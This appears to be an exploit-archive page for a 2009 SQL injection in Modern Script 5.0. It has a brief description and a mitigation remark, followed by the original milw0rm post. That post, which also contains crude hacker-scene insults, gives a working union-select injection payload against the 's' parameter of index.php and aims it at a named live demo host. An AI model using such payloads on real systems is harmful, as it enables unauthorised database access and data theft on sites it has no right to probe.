header-logo
Suggest Exploit
vendor:
Modern Script
by:
Red-D3v1L
7.5
CVSS
HIGH
Remote SQL Injection
CWE
Product Name: Modern Script
Affected Version From: Modern Script 5.0
Affected Version To: Modern Script 5.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2009

Modern Script 5.0 Remote SQL Injection Vulnerability

The Modern Script 5.0 index.php file is vulnerable to a remote SQL injection attack. By manipulating the 's' parameter in the URL, an attacker can execute arbitrary SQL queries on the database.

Mitigation:

To mitigate this vulnerability, the vendor should release a patch that properly sanitizes user input in the 's' parameter.
Source

Exploit-DB raw data:

/ ___   )(  __   )/ ___   )
\/   )  || (  )  |\/   )  |
    /   )| | /   |    /   )
   /   / | (/ /) |   /   / 
  /   /  |   / | |  /   /  
 /   (_/\|  (__) | /   (_/\
(_______/(_______)(_______/
       
==============================================================================
        [»] ~ Note : Hacker R0x Lamerz Sux !
==============================================================================
        [»]  Modern Script <== 5.0 (index.php s) Remote SQL Injection Vulnerability
==============================================================================
    [»] my home:             [ Hackteach.org ]
    [»] Script:              [ Modern Script 5.0 ]
    [»] Language:            [ PHP ]
    [»] Home:                [ http://cmsdemo.enterbt.hu/modern5 ]
    [»] Founder:             [ Red-D3v1L < php-c0de@hotmail.com > SQL@Hotmail.eS < ]
    [»] Gr44tz to:           [ Hackteach Team -  Sniper-Code - j0rd4n14n.r1z - The-g0bL!N - G-z3r0 ]
    [»] Fuck to :            [ Lito << Big Lamerz Sux << And Donky 5acker << n00bZ ]
########################################################################

===[ Exploit SQL ]===  

 [»] [Path]/index.php?s=[SQL]

 [»] Live dem0 : 

http://cmsdemo.enterbt.hu/modern5/index.php?s=-182+union+select+version(),2--


Author: Red-D3v1L <-

###########################################################################

# milw0rm.com [2009-08-31]

Navigation

Suggest Exploit

Services By CQR